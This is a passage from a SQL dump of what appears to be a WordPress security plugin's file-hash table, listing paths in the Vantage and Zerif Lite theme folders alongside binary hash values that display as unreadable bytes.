y','',0,'?'),('iX)6ВF','wp-content/themes/vantage/inc/settings/inc/color.php',0,'5 <6','5 <6','(KXq}нV\ZG@F\'**H','',0,'?'),(';M|','wp-content/themes/vantage/inc/settings/inc/color_object.php',0,'q>v|bHL','q>v|bHL','%.ͨhn5(Lt.x:.9','',0,'?'),('\\[Mr$9','wp-content/themes/vantage/inc/settings/inc/control/font.php',0,'2ƮQ9?ʊp','2ƮQ9?ʊp','DqnSWt%iU]d~%)','',0,'?'),('Ct6~\'<\n','wp-content/themes/vantage/inc/settings/inc/control/image_select.php',0,'-\"<I7uI','-\"<I7uI','ACV>eizOXyF2','',0,'?'),('FW|1B	;r','wp-content/themes/vantage/inc/settings/inc/control/measurement.php',0,'|(+U','|(+U','Xͭ!8!2LO\\n#o','',0,'?'),('k/i%Kaڈ','wp-content/themes/vantage/inc/settings/inc/control/premium.php',0,'RJ΢g$','RJ΢g$','O*z,lӊOc<4','',0,'?'),('lt{ۼҝt','wp-content/themes/vantage/inc/settings/inc/control/teaser.php',0,'hy$6&xGR','hy$6&xGR','5YS9K#ВxlRTǁ[#!','',0,'?'),('O]O\r,dA;','wp-content/themes/vantage/inc/settings/inc/control/text_select.php',0,', 9l$',', 9l$','Q\"]v~l:fOhgQ0','',0,'?'),('\":X9LÆO','wp-content/themes/vantage/inc/settings/inc/control/widget.php',0,'.N[kkNg,','.N[kkNg,','uI_F͚Zg,\rkݿO&$nӤ&','',0,'?'),('n>}t-O0\\','wp-content/themes/vantage/inc/settings/inc/css_functions.php',0,'xm0Sk)','xm0Sk)','^R\"?o6Ӭ6!eh`ۊ\Zլ','',0,'?'),('37]U','wp-content/themes/vantage/inc/settings/inc/page_settings.php',0,'9^a2u|GRV','9^a2u|GRV','W%})˺~0;ڟ9n,IE9','',0,'?'),('x','wp-content/themes/vantage/inc/settings/inc/page_settings_customizer.php',0,'#iMޣ4z+','#iMޣ4z+','T×!^T̍\nf!','',0,'?'),(')A.2qw','wp-content/themes/vantage/inc/settings/inc/sanitize.php',0,'WmF\02>','WmF\02>','$l-rY8an*W8','',0,'?'),('+o%.Q','wp-content/themes/vantage/inc/settings/inc/upgrade.php',0,'@7ȬNV','@7ȬNV','24n{3iS!','',0,'?'),('Cްx>','wp-content/themes/vantage/inc/settings/inc/webfont_manager.php',0,'Q3r{xjv','Q3r{xjv','lnѧI^4\'#ZԒZw\ZFa	','',0,'?'),('- Lz3[fdM#_','wp-content/themes/vantage/inc/settings/js/about.js',0,'ٌD;/fˌ\\`','ٌD;/fˌ\\`','=JyF__*,!}7O','',0,'?'),('S×2Zɗ','wp-content/themes/vantage/inc/settings/js/about.min.js',0,'A顮!~[Ћ^','A顮!~[Ћ^','*Mr$3I@ox0	}I]','',0,'?'),('Rc>2','wp-content/themes/vantage/inc/settings/js/control/font-control.js',0,'b)i漢6l6','b)i漢6l6','йe)0쯎|$','',0,'?'),('ei Ky4YO','wp-content/themes/vantage/inc/settings/js/control/font-control.min.js',0,'?:\'ivW','?:\'ivW','=S0Y05ٞRn\\^A+4W','',0,'?'),('[at*^LU','wp-content/themes/vantage/inc/settings/js/control/image-select-control.js',0,'p\'f0!%r','p\'f0!%r','z-;2a*Cl~kTe','',0,'?'),('B>;=i<wR','wp-content/themes/vantage/inc/settings/js/control/image-select-control.min.js',0,'TXt0EP|4+uq~','TXt0EP|4+uq~','\n\Zt1H_gLgO {6F','',0,'?'),('(޵\r[Tiz+,0','wp-content/themes/vantage/inc/settings/js/control/measurement-control.js',0,'oHc ­\"oaQ','oHc ­\"oaQ','}_qc:~\\Ro\\3','',0,'?'),('TK2?ϧj','wp-content/themes/vantage/inc/settings/js/control/measurement-control.min.js',0,'GsjrB','GsjrB','V*XbT)v>?qFA]','',0,'?'),('$w,w','wp-content/themes/vantage/inc/settings/js/control/teaser-control.js',0,'U8;j 8','U8;j 8','2rQ\r2C\riHKI','',0,'?'),('PEvƩHu','wp-content/themes/vantage/inc/settings/js/control/teaser-control.min.js',0,'y&Gޙ','y&Gޙ','YKq}\"PZWRO{S6^/]','',0,'?'),('k54B~m\0','wp-content/themes/vantage/inc/settings/js/control/text-select-control.js',0,'rVh%0d\"','rVh%0d\"','	ޤm8-Xy)w0}oh','',0,'?'),('̻li1x','wp-content/themes/vantage/inc/settings/js/control/text-select-control.min.js',0,'[+˫ă','[+˫ă','Ħ`a[(V4m\n<p ^&HI','',0,'?'),('cb\0˰a6oc@','wp-content/themes/vantage/inc/settings/js/control/widget-setting-control.js',0,'GsݥT\0','GsݥT\0','p	HLEa<_+ؚ.xxt4I','',0,'?'),('J\"gHdgA','wp-content/themes/vantage/inc/settings/js/control/widget-setting-control.min.js',0,'t0(,Xk&','t0(,Xk&','ՙ\Z8}!\'y-xz\0V','',0,'?'),('qSlTl5Wמ~','wp-content/themes/vantage/inc/settings/js/live.js',0,'n@1(ʄg','n@1(ʄg','vfu	*C44N\r;wi.','',0,'?'),('z\Z -H1','wp-content/themes/vantage/inc/settings/js/live.min.js',0,'{ǌAxJO)','{ǌAxJO)','%לnJK/*a`\nA~=#','',0,'?'),('uVb^L<U','wp-content/themes/vantage/inc/settings/js/page-settings-admin.js',0,'E\"vxÀ ','E\"vxÀ ','xXgj=Y2?fO([\"','',0,'?'),('_xAic','wp-content/themes/vantage/inc/settings/js/page-settings-admin.min.js',0,'[	o(/T1;','[	o(/T1;','πCWC,6vbR:y\Z','',0,'?'),('BL+\'Ȫj3W','wp-content/themes/vantage/inc/settings/js/page-settings.js',0,'^\rn3d','^\rn3d','Q X\"|_4l=HS)','',0,'?'),('Uߖ#1*\"s','wp-content/themes/vantage/inc/settings/js/page-settings.min.js',0,'~klS','~klS','>~QoWLt7%\nS^CrL','',0,'?'),('3]ZCç[C?','wp-content/themes/vantage/inc/settings/js/tinycolor.js',0,'7ÃͣmČD','7ÃͣmČD','%W bM~<뮘<n)!;','',0,'?'),('	}tSY#&','wp-content/themes/vantage/inc/settings/js/tinycolor.min.js',0,'\ZM|','\ZM|','ə`d}QȘԈ_C23','',0,'?'),('+1/X\\','wp-content/themes/vantage/inc/settings/settings.php',0,'KRı^JA_','KRı^JA_','U/W	q3t5iۻ>,{','',0,'?'),('Bg-4c','wp-content/themes/vantage/inc/settings.php',0,'cT<*L?','cT<*L?','4y_yԪ8zv0\"a]=','',0,'?'),('_ovK{Z','wp-content/themes/vantage/inc/template-tags.php',0,'t6x+G}e*','t6x+G}e*','M]Q<K[),VHt2~_','',0,'?'),('͹9Q8ٍ-}','wp-content/themes/vantage/inc/widgets.php',0,'\n;\n\"	(26(JB','\n;\n\"	(26(JB','\r8\'EKdMN&\\	.昻5','',0,'?'),('OH1(boi','wp-content/themes/vantage/index.php',0,'>D\\tb','>D\\tb','^;5C8DwyCu\0u2','',0,'?'),('1&BxLv}!5','wp-content/themes/vantage/js/color-picker.js',0,'fr6x9','fr6x9','19W{!\0%k\ZX N\n15]>\0G','',0,'?'),('<OQ\Z','wp-content/themes/vantage/js/color-picker.min.js',0,'K1e?!64','K1e?!64','nҳu!7r[T2f\nZs*','',0,'?'),('/i֭	#<\n','wp-content/themes/vantage/js/html5.js',0,'Fh7\nO\"o5','Fh7\nO\"o5','hX1\"̵ԂQC.}2-','',0,'?'),('}ޟF|1K7','wp-content/themes/vantage/js/html5.min.js',0,'`AYlE[+','`AYlE[+',']>piȒhjqF\ne	,RF)','',0,'?'),('S|s!%2Bi','wp-content/themes/vantage/js/jquery.fitvids.js',0,'TG\0(Ez[','TG\0(Ez[','.p<BA@SxLCW`=\n0`','',0,'?'),('sSZr5j\r!','wp-content/themes/vantage/js/jquery.fitvids.min.js',0,'GJliE{\\R','GJliE{\\R','ɣ{]<ߘo7Ŏ}-O:','',0,'?'),('-c\0=`)vF~','wp-content/themes/vantage/js/jquery.flexslider.js',0,')jW!Q',')jW!Q','tt=؄\0715-Aa/xF1','',0,'?'),('4x/Бr\n	X$','wp-content/themes/vantage/js/jquery.flexslider.min.js',0,'aғ4R3','aғ4R3','FPs6DK/TdY','',0,'?'),('9EtV಑JCQ','wp-content/themes/vantage/js/jquery.theme-main.js',0,'6@^|0o;','6@^|0o;','\'	MhTd{(@2nSb','',0,'?'),('V\08q(','wp-content/themes/vantage/js/jquery.theme-main.min.js',0,'BPuWI\0˂','BPuWI\0˂','?LkV58Lq\rwc􁦸t~Y\",','',0,'?'),('!8UmXP-,mJg<','wp-content/themes/vantage/js/jquery.touchSwipe.js',0,'gjWZYV/XΊ','gjWZYV/XΊ','\Z^?\\5F7PHǊ?yzO','',0,'?'),('QS.rz\0U,4','wp-content/themes/vantage/js/jquery.touchSwipe.min.js',0,'o%I#<-<','o%I#<-<','+CͲzUm)s?/Q{T','',0,'?'),('c}ԌJ*-','wp-content/themes/vantage/js/keyboard-image-navigation.js',0,'vAj','vAj','bTA\0OV~7g{\\~I̞i{','',0,'?'),('lFХltQov:3','wp-content/themes/vantage/js/keyboard-image-navigation.min.js',0,'FL_y=0	','FL_y=0	','kbl& j`%w2f>_n','',0,'?'),('&X݂D`','wp-content/themes/vantage/js/selectivizr.js',0,'2jJ0b','2jJ0b','(ӊ=WY\\He\Z=UbE','',0,'?'),('u@U\0b !2','wp-content/themes/vantage/js/selectivizr.min.js',0,'[\n)&,N0ݭ','[\n)&,N0ݭ','\'̗g\Z^mILP)hH=J5','',0,'?'),('`EAP_꒓B.J','wp-content/themes/vantage/loop.php',0,'I\rYHOhC','I\rYHOhC','pi\0n	3 0o7-R5','',0,'?'),('Į ł{߸','wp-content/themes/vantage/loops/loop-blog.php',0,'rז㬗9aŗne','rז㬗9aŗne','0TY\0};~Ax@Om sq6u','',0,'?'),('̇ƜǛCՂ1','wp-content/themes/vantage/loops/loop-carousel.php',0,'mXVL','mXVL','gJejM[Tםe N','',0,'?'),('\Z$ul','wp-content/themes/vantage/loops/loop-circleicon.php',0,':7R',':7R','@(7s?3IQEY@*+-Y','',0,'?'),('g[dM\Z','wp-content/themes/vantage/loops/loop-grid.php',0,'[==6Rs','[==6Rs','ƣK9}tgjb&.\0/0','',0,'?'),('XҿSr\n)','wp-content/themes/vantage/loops/loop-slider.php',0,'5mݵ~)ə','5mݵ~)ə','QTRONu6\'r&&o7RL@7','',0,'?'),('^fByItq\r','wp-content/themes/vantage/no-results.php',0,'^]\nݺ\rha.','^]\nݺ\rha.','ǀBʺcz*(8vP','',0,'?'),(']Y;N\rKo灜','wp-content/themes/vantage/page.php',0,'xg(y :}{X','xg(y :}{X','em쯐qzaK$\"%','',0,'?'),('ܸ\n_;q','wp-content/themes/vantage/parts/footer-vertical.php',0,'{˪4_o=','{˪4_o=','~Fmg5s\rXQ#REHM@_','',0,'?'),('aS<ւ\0E	','wp-content/themes/vantage/parts/footer.php',0,'S܂Qrnd','S܂Qrnd','qǈ-蛖%L5.ũ','',0,'?'),('\\jE^\\.','wp-content/themes/vantage/parts/masthead-logo-in-menu.php',0,'k޵!Ri','k޵!Ri','/+!Sl\n/rwU_B','',0,'?'),('R4ΕM~','wp-content/themes/vantage/parts/masthead.php',0,'ZEfKEf','ZEfKEf',':\r7JGT}I\\e2`&02wVV','',0,'?'),('ƮJ|\0ePW','wp-content/themes/vantage/parts/menu-empty.php',0,'7|߳ZIN8%9','7|߳ZIN8%9','1B9\ZgpU^&\\6:','',0,'?'),('{e(;ٰ','wp-content/themes/vantage/parts/menu.php',0,'ߛq&:g\"','ߛq&:g\"','(32s\\\'Z4(f{L$','',0,'?'),('dWr','wp-content/themes/vantage/premium/addons/ajax-comments/ajax-comments.php',0,'%Rfȳ','%Rfȳ','`\'7\"&Y|ZY]ݛ6W5','',0,'?'),('b&\'G\0~,4q\'','wp-content/themes/vantage/premium/addons/ajax-comments/inc/comments.php',0,'{>BZ<O\ZX','{>BZ<O\ZX','hU+!v\'h_M@\'Xo[b`ՠX','',0,'?'),('/Ђ;MH@','wp-content/themes/vantage/premium/addons/ajax-comments/js/ajax-comments.js',0,';`9EjP;7',';`9EjP;7','$QD]RD7#>T~j[׮vf=','',0,'?'),('\\@~F T\r8','wp-content/themes/vantage/premium/addons/ajax-comments/js/ajax-comments.min.js',0,'2M} nIsu=\"','2M} nIsu=\"','~d3m\nT׋cТjP#','',0,'?'),('jnOA(','wp-content/themes/vantage/premium/addons/no-attribution/no-attribution.php',0,'Ĩ}.o0','Ĩ}.o0','עQn)H\rz^-ƑrG','',0,'?'),('>HݹZHE','wp-content/themes/vantage/premium/css/codemirror/lib/codemirror.js',0,'>ݣ\nP','>ݣ\nP','*n7k<cP\n0-?SI','',0,'?'),('	Di얠','wp-content/themes/vantage/premium/css/codemirror/lib/codemirror.min.js',0,'TW+O  ,)3K','TW+O  ,)3K','!J?G)$]rݏg-uPay<*','',0,'?'),('N\r#ZLQMJ','wp-content/themes/vantage/premium/css/codemirror/lib/util/closetag.js',0,'Q9-@$P','Q9-@$P','ɀy1FNkxha0]','',0,'?'),('ӾBkBh{\\T','wp-content/themes/vantage/premium/css/codemirror/lib/util/closetag.min.js',0,'.N[`)ᯤ','.N[`)ᯤ','EKm;Ө#{=vv\\J9X;7n','',0,'?'),('XG05iR%','wp-content/themes/vantage/premium/css/codemirror/lib/util/css-lint.js',0,'97*kFQB܋1B,','97*kFQB܋1B,','ǫ1Z\\[&\"yz\0\\$','',0,'?'),('\"qg[\ZD','wp-content/themes/vantage/premium/css/codemirror/lib/util/css-lint.min.js',0,'3ۀ6Ӫ','3ۀ6Ӫ','TMNB\'gړ7h̐6-','',0,'?'),('A0ȩ}7	o\nm','wp-content/themes/vantage/premium/css/codemirror/lib/util/csslint.js',0,'YV\'3%t','YV\'3%t',':ܫ	+_1\0\'\"_s>','',0,'?'),(',M2h(>*','wp-content/themes/vantage/premium/css/codemirror/lib/util/csslint.min.js',0,'Q\"\0Q','Q\"\0Q','{.CwU%t<|C\nNfȍb','',0,'?'),('tı[E(uLV','wp-content/themes/vantage/premium/css/codemirror/lib/util/dialog.js',0,'^}z\rf8\r','^}z\rf8\r','Ah`<&(&0.]r','',0,'?'),('H*:āZ8ҏ\\+','wp-content/themes/vantage/premium/css/codemirror/lib/util/dialog.min.js',0,'ՋPj4+T','ՋPj4+T','\nG-)7>ePJy8','',0,'?'),('cJB\"','wp-content/themes/vantage/premium/css/codemirror/lib/util/foldcode.js',0,'{;J+$E','{;J+$E','E3вfX%̿-UL_9EzQ!B\0T','',0,'?'),('bK$}]o,-,','wp-content/themes/vantage/premium/css/codemirror/lib/util/foldcode.min.js',0,'rGPU{\\','rGPU{\\','j\"%`p$fYfh?','',0,'?'),('rU?bhDpY','wp-content/themes/vantage/premium/css/codemirror/lib/util/formatting.js',0,'twCN\0','twCN\0','Xuʦ^0z$A:]wq$','',0,'?'),('2H{y$','wp-content/themes/vantage/premium/css/codemirror/lib/util/formatting.min.js',0,'lzxg]','lzxg]','[՛IOS)ώ}d9,X\nxY?\Z4\'>\Z\"','',0,'?'),('12^F9','wp-content/themes/vantage/premium/css/codemirror/lib/util/javascript-hint.js',0,'#{em0\nۢ','#{em0\nۢ','lqP5ǡO@hy,`b7','',0,'?'),('_o5\ZB\0㳥','wp-content/themes/vantage/premium/css/codemirror/lib/util/javascript-hint.min.js',0,'+-/0S?|9o','+-/0S?|9o','\Z}z;R<8o=7hP','',0,'?'),('ldH\\ц;N','wp-content/themes/vantage/premium/css/codemirror/lib/util/lint.js',0,'K@ Rw*+0','K@ Rw*+0','T(ʖVENriQ<nN','',0,'?'),('O=ۨ%{SD{','wp-content/themes/vantage/premium/css/codemirror/lib/util/lint.min.js',0,'3Y5Qys\0','3Y5Qys\0','uA95ȬχB]pU!d','',0,'?'),('1&EvNXr@','wp-content/themes/vantage/premium/css/codemirror/lib/util/loadmode.js',0,'4\"*j+C=U','4\"*j+C=U','f^	k\Z kVxhDQa|','',0,'?'),('g9hH','wp-content/themes/vantage/premium/css/codemirror/lib/util/loadmode.min.js',0,'=2ۺ\rm??','=2ۺ\rm??','\"/sckgߐdy٬E@ZI','',0,'?'),('6{On.aN{','wp-content/themes/vantage/premium/css/codemirror/lib/util/match-highlighter.js',0,'i7W^7xұ3','i7W^7xұ3','t+~E+z,VǌRsK','',0,'?'),('Qk˼\'Ft]lg','wp-content/themes/vantage/premium/css/codemirror/lib/util/match-highlighter.min.js',0,'\"ozߨsu','\"ozߨsu','^4h15pe#\"wWP#','',0,'?'),('*WA*=A','wp-content/themes/vantage/premium/css/codemirror/lib/util/multiplex.js',0,'k\"1g:P;^\n3`G','k\"1g:P;^\n3`G','דlP7Ƈ(J\Z扤@','',0,'?'),('vĲe^\\','wp-content/themes/vantage/premium/css/codemirror/lib/util/multiplex.min.js',0,'p@7K]&\0D','p@7K]&\0D',';S0:>DpHax!G	=z','',0,'?'),('Psy9dgM','wp-content/themes/vantage/premium/css/codemirror/lib/util/overlay.js',0,'uR\\6nĳN','uR\\6nĳN','\rY*WJd}k̯DdP\Z6','',0,'?'),('\"y&O;M$','wp-content/themes/vantage/premium/css/codemirror/lib/util/overlay.min.js',0,':(lυ7Upٶ',':(lυ7Upٶ','K1=跎1bkRD)+3\r	','',0,'?'),('ՓL貝^\rs\Zҏ','wp-content/themes/vantage/premium/css/codemirror/lib/util/pig-hint.js',0,'.UE/2','.UE/2','lI(n4MM -uŗ!V$','',0,'?'),('>B?{t&%?tHZj','wp-content/themes/vantage/premium/css/codemirror/lib/util/pig-hint.min.js',0,'G5S','G5S','f3!t+leeQcf>|)]','',0,'?'),('La o^\'|E','wp-content/themes/vantage/premium/css/codemirror/lib/util/runmode.js',0,'\Z\'ra9{\nd','\Z\'ra9{\nd','ngY:%^cQƉ25G','',0,'?'),('m#49̄/W','wp-content/themes/vantage/premium/css/codemirror/lib/util/runmode.min.js',0,'CG߯bx3\'','CG߯bx3\'','RaW3\"MТAP$J@İ6?u','',0,'?'),('RYѓXσۂ','wp-content/themes/vantage/premium/css/codemirror/lib/util/search.js',0,'1?Ìu57QF.','1?Ìu57QF.','\rv_w{=9L=dmYQ','',0,'?'),('t33zm#','wp-content/themes/vantage/premium/css/codemirror/lib/util/search.min.js',0,'sHWڞ/*R','sHWڞ/*R','~Dzi{+l!yV\rPohGb2','',0,'?'),('W={NLe','wp-content/themes/vantage/premium/css/codemirror/lib/util/searchcursor.js',0,'*Ël]>','*Ël]>','~8vd؋aAyr%U~2\rT.','',0,'?'),('&+\'ЫLye>t','wp-content/themes/vantage/premium/css/codemirror/lib/util/searchcursor.min.js',0,'м_m','м_m',']\"	\Zhb_魎~;3xO|','',0,'?'),(')8{<e=','wp-content/themes/vantage/premium/css/codemirror/lib/util/simple-hint.js',0,'_/6zk_G̬','_/6zk_G̬','$=u\rIez.Qw^ٕqHmj|','',0,'?'),('xM$\ZEn','wp-content/themes/vantage/premium/css/codemirror/lib/util/simple-hint.min.js',0,'1QFߔ2yn','1QFߔ2yn','^m0<fBFEDU','',0,'?'),('\"z- O+\\b','wp-content/themes/vantage/premium/css/codemirror/mode/css/css.js',0,'FtQ0X+\\uYw','FtQ0X+\\uYw','V:I	T`E@49i~','',0,'?'),('Xl$\"g','wp-content/themes/vantage/premium/css/codemirror/mode/css/css.min.js',0,'h\"GjL\r{','h\"GjL\r{','x4\\RTU׹L[ѳ8\"M4','',0,'?'),('=#M\"ݡfuҁd','wp-content/themes/vantage/premium/css/css.php',0,'fL?\\:IgD<','fL?\\:IgD<','L!۷Jk\\rMm>X;8','',0,'?'),('yukl6\r','wp-content/themes/vantage/premium/css/js/admin.js',0,'AlD88t\0i','AlD88t\0i','8\'i`racEкzCQNe','',0,'?'),(']ri4Q(iU^','wp-content/themes/vantage/premium/css/js/admin.min.js',0,'č;\0]','č;\0]',' :I(^{fk)wy','',0,'?'),('\"&BǃA9z{','wp-content/themes/vantage/premium/css/page.php',0,'aJ}H\'cgh','aJ}H\'cgh','jjdGOj:4 =N\0f.	d w','',0,'?'),('2r{:o\'','wp-content/themes/vantage/premium/premium.php',0,'hT\"\nҼƼ#?','hT\"\nҼƼ#?','xB11QEuMJ','',0,'?'),('^)P1޴','wp-content/themes/vantage/premium/share/share.php',0,'#0i\\Qؠ3','#0i\\Qؠ3','vxE9}3.yJCʌNS','',0,'?'),('h΁ptSLQ','wp-content/themes/vantage/premium/themes/origami.php',0,'mFEq(','mFEq(','݈¦p3@2XP)GgnE','',0,'?'),('\r<+qj>','wp-content/themes/vantage/premium/themes/vantage.php',0,'%\nas-\n','%\nas-\n','i˜^i7D^᝵=M','',0,'?'),('rd \"W΍8','wp-content/themes/vantage/premium/update/update.php',0,'Bj ==zo_q','Bj ==zo_q','O8ƭ98$CVPޢ~ye','',0,'?'),('CԤH_Lr&_j','wp-content/themes/vantage/premium/widgets/js/map.js',0,'<ᲊc#Oz@','<ᲊc#Oz@','Ǚ;qUY\n)f1Z8	-VVg&','',0,'?'),('ǭ\'7a4','wp-content/themes/vantage/premium/widgets/js/map.min.js',0,'FEm','FEm','Pw^BUFY.-#vNڇ','',0,'?'),('yM4$NT< ','wp-content/themes/vantage/premium/widgets/widgets.php',0,'ux<uR8wĮ','ux<uR8wĮ','_]}T\nwT_[v&o','',0,'?'),('i&\r*Sf','wp-content/themes/vantage/search.php',0,'I}\np:\"Ij˝','I}\np:\"Ij˝','Z#_0ew>AoGK[','',0,'?'),('Mb>HXDQ\Z*','wp-content/themes/vantage/searchform.php',0,'ydU19=','ydU19=','S_&j~BK{\r\Zp\"g-\Zltd*','',0,'?'),('$e\'?pj\'E&','wp-content/themes/vantage/sidebar-shop.php',0,'&i\0;bD','&i\0;bD','^kl7D%`&D|!\'@%Gn','',0,'?'),('9UvlcA','wp-content/themes/vantage/sidebar.php',0,'݉O3޷6D]','݉O3޷6D]','0v<YɭׂcӖ	K~w','',0,'?'),('V	}C.BZ>\\l','wp-content/themes/vantage/single.php',0,'	O@\nE9','	O@\nE9','}D9.lL<>RE\n','',0,'?'),(' tjN)B','wp-content/themes/vantage/slider/demo.php',0,'MUD_@gqMT8\n','MUD_@gqMT8\n','Bؼ	t M7tŌ0ʈߺ','',0,'?'),('TVABNm9D/','wp-content/themes/vantage/templates/template-full-notitle.php',0,'_G45S.L2_','_G45S.L2_','&WK0o\0(b/xKcٔ','',0,'?'),('LcVi 稏','wp-content/themes/vantage/templates/template-full.php',0,'fV)x{F4','fV)x{F4','LFPt5吏G8	HLXv5','',0,'?'),('eql>EoE,\rH','wp-content/themes/vantage/tour/tour.php',0,'O7ޙ).I\r','O7ޙ).I\r',' ?ț7*Rn#Ra>_&','',0,'?'),('RNo','wp-content/themes/vantage-child/functions.php',0,'whP\'g','whP\'g','}(%5l](9@d;(hM+^','',0,'?'),('+M>=\n3','wp-content/themes/zerif-lite/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','׍ihL\Z',',\nW0<j Ru}:oܔR','',0,'?'),('+1I','wp-content/themes/zerif-lite/CHANGELOG.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!3҉M','m }>%U=Mn<CV%','',0,'?'),('s4	B{iw','wp-content/themes/zerif-lite/archive-download.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R\"8Z0)Π','їB2y,$-K`1[.ADᑶ','',0,'?'),('~?M>u/[s','wp-content/themes/zerif-lite/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#XźR֗d,','ԾCY2TVB!$amA\nNy','',0,'?'),('wH]t0T8?','wp-content/themes/zerif-lite/class-tgm-plugin-activation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ng\Zrqxʹ',':C.ϻoJ#\Z`|s','',0,'?'),('ɥk*axN','wp-content/themes/zerif-lite/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^0rr[u;~/\"','mTsl\0s~wt˓ɚGU%','',0,'?'),('}%/\"1YpOo','wp-content/themes/zerif-lite/content-archive-download.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[y:+4','څ-M^M.JT&L\ZeQ3XC3','',0,'?'),('3Tmn*6LNĉ9','wp-content/themes/zerif-lite/content-frontpage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Fbr*6=]','4b8)?#ieEPwRs','',0,'?'),('kLC0(\0v','wp-content/themes/zerif-lite/content-large.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h_О<_LNJ(','!2oHK]i!+}H9Z^V','',0,'?'),('g^Pu\0\r$S','wp-content/themes/zerif-lite/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ET','ή]Eʄ*:]ts^\Z:6*iEY\n','',0,'?'),('Hāo{\';1','wp-content/themes/zerif-lite/content-page-no-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%dyd3iD','Lʹcwڌ}`K^ĺ+	','',0,'?'),('Ժna)H>','wp-content/themes/zerif-lite/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}>+Վ[','#G\r{@ξerLsoX@c2ad','',0,'?'),('4x0kE6Sh&','wp-content/themes/zerif-lite/content-single-download.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HǍ6ѵ','@e\r@\Zz_\Zjd՞>UgU','',0,'?'),('S=6as','wp-content/themes/zerif-lite/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!_wx%P<','x]B2uj;q]G>=b','',0,'?'),('Չ6ȗĬ5\'','wp-content/themes/zerif-lite/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3溫Z`\Zk','>mK(~Mx[mބ1fWY','',0,'?'),('xGc.qat','wp-content/themes/zerif-lite/css/bootstrap-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ëSLW_','SU`\0z}YĀÈyd','',0,'?'),('= Fߤ4F','wp-content/themes/zerif-lite/css/bootstrap.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[ZkWD','$&HS`6ϣoA^\nQ~D','',0,'?'),('{_,E!','wp-content/themes/zerif-lite/css/custom-editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o=|','[Zol5fo.Oߥ=oSr<II0','',0,'?'),('Pi5ed˫R41','wp-content/themes/zerif-lite/css/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!ۗ\'DD^	̼u',' ̟z\\]INh/CQ,D','',0,'?'),('?>NR¹E','wp-content/themes/zerif-lite/css/font-awesome.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@v넚Eǐ;','&zB]<\"d5zy;{-6<C	','',0,'?'),('*=+6IǷoCw^','wp-content/themes/zerif-lite/css/ie.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v$7+s8؏b','psccE\Z4c:T/','',0,'?'),('M8Vl_w(','wp-content/themes/zerif-lite/css/responsive.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nTQ[(m','=bTE:\r<JwֶDɇA\nJ&','',0,'?'),('K氜IzjG','wp-content/themes/zerif-lite/css/style-mobile.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ė&=Wtl','j}]|R%df@\r̞w^cw','',0,'?'),('&Sט`Zg~','wp-content/themes/zerif-lite/css/zerif_customizer_custom_css.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l	cb]','#.C4uޭYG3#n','',0,'?'),('qK\r@Ŗth\\El','wp-content/themes/zerif-lite/fonts/FontAwesome.otf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','])/%W>','׈>*M<L8CC<h[},','',0,'?'),('#Սu\r','wp-content/themes/zerif-lite/fonts/fontawesome-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%$!z','ό;Rsx}|4>ƙ`2','',0,'?'),('\rS<Hƻ/ ','wp-content/themes/zerif-lite/fonts/fontawesome-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9OhMff]>','EVS`$?aj`)x0+XK','',0,'?'),('&? #xMlK','wp-content/themes/zerif-lite/fonts/fontawesome-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']%5ptHg','E4.t)|(7J>n;\Z^h\nØ','',0,'?'),('iY!A\0Q	','wp-content/themes/zerif-lite/fonts/fontawesome-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6{9AH','\r8γey̿ǹH-_','',0,'?'),('-RW~gE>','wp-content/themes/zerif-lite/fonts/fontawesome-webfont.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|npv&','1+<KM˷F@&R̲t|a==mR','',0,'?'),('ϰ^-t_\0W6','wp-content/themes/zerif-lite/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TXnϷb6','0=f)\"3֠̖i}^A-','',0,'?'),('{\\*h^6!UP','wp-content/themes/zerif-lite/front-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C,=Z\ZסH','nK\"MaL	8\\$WN(b^f','',0,'?'),('3|&b[}ۈ2','wp-content/themes/zerif-lite/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?G	SCAD$','ST$E\'Vz!bu/ܡD(Hp','',0,'?'),('nX %ƄfB9','wp-content/themes/zerif-lite/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q!PXv~aƏ$','H4G{<=ψuP52<eN\"o','',0,'?'),('N|U